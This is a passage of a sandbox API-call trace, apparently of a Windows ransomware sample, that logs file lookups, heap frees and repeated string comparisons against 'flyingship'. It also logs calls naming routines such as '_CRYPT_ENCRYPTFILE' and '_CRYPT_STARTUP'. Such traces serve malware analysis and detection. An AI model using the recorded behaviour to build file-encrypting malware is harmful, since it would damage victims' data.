ftLastWriteTime.dwLowDateTime=0x6074a350, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="93QZ.swf", cAlternateFileName="")) returned 0x90add8 [0197.473] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.474] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zzg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Op Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gi7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LiHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iHe dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="He dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QIhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hO\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\93QZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.478] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.478] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.478] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.478] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.479] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.479] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.479] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.479] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.479] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x6074a350, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="93QZ.swf", cAlternateFileName="")) returned 0x90ae18 [0197.481] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.481] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.481] HeapFree (in: hHeap=0x8a0000, 